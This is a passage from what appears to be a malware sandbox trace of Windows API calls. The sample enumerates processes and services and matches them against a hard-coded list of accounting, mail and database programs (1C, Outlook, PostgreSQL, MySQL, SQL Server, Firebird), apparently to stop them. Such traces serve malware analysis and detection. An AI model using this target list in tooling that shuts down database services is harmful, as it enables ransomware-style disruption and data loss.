(lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0252.017] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.017] lstrlenW (lpString="svchost.exe") returned 11 [0252.017] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.017] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.018] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0252.018] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0252.018] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x340, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.018] lstrlenW (lpString="svchost.exe") returned 11 [0252.018] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0252.018] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0252.018] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0252.018] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0252.018] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0252.018] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x378, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.019] lstrlenW (lpString="svchost.exe") returned 11 [0252.019] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0252.019] lstrlenW (lpString="audiodg.exe") returned 11 [0252.019] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.019] lstrlenW (lpString="svchost.exe") returned 11 [0252.019] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.020] lstrlenW (lpString="svchost.exe") returned 11 [0252.020] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0252.020] lstrlenW (lpString="userinit.exe") returned 12 [0252.020] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x454, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x340, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0252.020] lstrlenW (lpString="dwm.exe") returned 7 [0252.020] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x460, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x448, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0252.021] lstrlenW (lpString="explorer.exe") returned 12 [0252.021] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0252.021] lstrlenW (lpString="spoolsv.exe") returned 11 [0252.021] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0252.021] lstrlenW (lpString="taskhost.exe") returned 12 [0252.021] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0252.021] lstrlenW (lpString="svchost.exe") returned 11 [0252.021] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x460, pcPriClassBase=8, dwFlags=0x0, szExeFile="MicosoftSearch.exe")) returned 1 [0252.022] lstrlenW (lpString="MicosoftSearch.exe") returned 18 [0252.022] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x54c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0252.022] lstrlenW (lpString="reader_sl.exe") returned 13 [0252.022] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0252.022] lstrlenW (lpString="dllhost.exe") returned 11 [0252.022] Process32NextW (in: hSnapshot=0x3b8, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x258, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 0 [0252.023] CloseHandle (hObject=0x3b8) returned 1 [0252.023] Sleep (dwMilliseconds=0x1f4) [0252.813] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x47ea380 [0252.844] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 0 [0252.844] GetLastError () returned 0xea [0252.844] RtlAllocateHeap (HeapHandle=0xb00000, Flags=0x0, Size=0xcec) returned 0x3dec5a0 [0252.844] EnumServicesStatusExW (in: hSCManager=0x47ea380, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x3dec5a0, cbBufSize=0xcec, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x3dec5a0, pcbBytesNeeded=0xa7ff44, lpServicesReturned=0xa7ff5c, lpResumeHandle=0x0) returned 1 [0252.845] CloseServiceHandle (hSCObject=0x47ea380) returned 1 [0252.845] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0252.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0252.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0252.845] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0252.845] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0252.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0252.845] lstrlenW (lpString="AudioSrv") returned 8 [0252.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0252.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0252.845] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0252.845] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0252.845] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0252.845] lstrlenW (lpString="BFE") returned 3 [0252.845] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0252.845] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0252.845] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0252.845] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0252.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0252.846] lstrlenW (lpString="CryptSvc") returned 8 [0252.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0252.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0252.846] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0252.846] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0252.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0252.846] lstrlenW (lpString="CscService") returned 10 [0252.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0252.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0252.846] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0252.846] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0252.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0252.846] lstrlenW (lpString="DcomLaunch") returned 10 [0252.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0252.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0252.846] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0252.846] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0252.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0252.846] lstrlenW (lpString="Dhcp") returned 4 [0252.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0252.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0252.846] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0252.846] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0252.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0252.846] lstrlenW (lpString="Dnscache") returned 8 [0252.846] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0252.846] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0252.846] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0252.846] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0252.846] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0252.846] lstrlenW (lpString="DPS") returned 3 [0252.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0252.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0252.847] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0252.847] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0252.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0252.847] lstrlenW (lpString="eventlog") returned 8 [0252.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0252.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0252.847] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0252.847] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0252.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0252.847] lstrlenW (lpString="EventSystem") returned 11 [0252.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0252.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0252.847] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0252.847] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0252.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0252.847] lstrlenW (lpString="gpsvc") returned 5 [0252.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0252.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0252.847] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0252.847] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0252.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0252.847] lstrlenW (lpString="LanmanWorkstation") returned 17 [0252.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0252.847] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0252.847] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0252.847] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0252.847] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0252.847] lstrlenW (lpString="lmhosts") returned 7 [0252.847] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0252.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0252.848] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0252.848] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0252.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0252.848] lstrlenW (lpString="MMCSS") returned 5 [0252.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0252.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0252.848] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0252.848] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0252.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0252.848] lstrlenW (lpString="MpsSvc") returned 6 [0252.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0252.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0252.848] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0252.848] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0252.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0252.848] lstrlenW (lpString="NlaSvc") returned 6 [0252.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0252.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0252.848] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0252.848] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0252.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0252.848] lstrlenW (lpString="nsi") returned 3 [0252.848] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0252.848] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0252.848] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0252.848] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0252.848] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0252.849] lstrlenW (lpString="PcaSvc") returned 6 [0252.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0252.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0252.849] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0252.849] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0252.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0252.849] lstrlenW (lpString="PlugPlay") returned 8 [0252.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0252.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0252.849] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0252.849] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0252.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0252.849] lstrlenW (lpString="Power") returned 5 [0252.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0252.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0252.849] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0252.849] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0252.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0252.849] lstrlenW (lpString="ProfSvc") returned 7 [0252.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0252.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0252.849] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0252.849] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0252.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0252.849] lstrlenW (lpString="RpcEptMapper") returned 12 [0252.849] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0252.849] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0252.849] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0252.849] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0252.849] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0252.849] lstrlenW (lpString="RpcSs") returned 5 [0252.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0252.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0252.850] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0252.850] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0252.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0252.850] lstrlenW (lpString="SamSs") returned 5 [0252.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0252.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0252.850] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0252.850] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0252.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0252.850] lstrlenW (lpString="Schedule") returned 8 [0252.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0252.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0252.850] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0252.850] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0252.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0252.850] lstrlenW (lpString="SENS") returned 4 [0252.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0252.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0252.850] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0252.850] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0252.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0252.850] lstrlenW (lpString="ShellHWDetection") returned 16 [0252.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0252.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0252.850] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0252.850] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0252.850] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0252.850] lstrlenW (lpString="Spooler") returned 7 [0252.850] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0252.850] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0252.851] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0252.851] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0252.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0252.851] lstrlenW (lpString="SysMain") returned 7 [0252.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SysMain") returned -1 [0252.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SysMain") returned -1 [0252.851] lstrcmpiW (lpString1="sqlwriter", lpString2="SysMain") returned -1 [0252.851] lstrcmpiW (lpString1="mssqlserver", lpString2="SysMain") returned -1 [0252.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SysMain") returned -1 [0252.851] lstrlenW (lpString="Themes") returned 6 [0252.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 [0252.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1 [0252.851] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1 [0252.851] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1 [0252.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1 [0252.851] lstrlenW (lpString="UxSms") returned 5 [0252.851] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1 [0252.851] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1 [0252.851] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1 [0252.851] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1 [0252.851] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1 [0252.851] HeapFree (in: hHeap=0xb00000, dwFlags=0x0, lpMem=0x3dec5a0 | out: hHeap=0xb00000) returned 1 [0252.851] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x3ac [0252.852] Process32FirstW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0252.853] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0252.853] lstrlenW (lpString="System") returned 6 [0252.853] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1 [0252.853] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1 [0252.853] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1 [0252.853] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1 [0252.853] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1 [0252.853] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1 [0252.853] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1 [0252.853] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x10c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0252.853] lstrlenW (lpString="smss.exe") returned 8 [0252.853] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1 [0252.854] Process32NextW (in: hSnapshot=0x3ac, lppe=0xa7fd34 | out: lppe=0xa7fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x148, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0252.854] lstrlenW (lpString="csrss.exe") returned 9 [0252.854] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1 [0252.854] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1 [0252.854] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1 [0252.854] lstrcmpiW 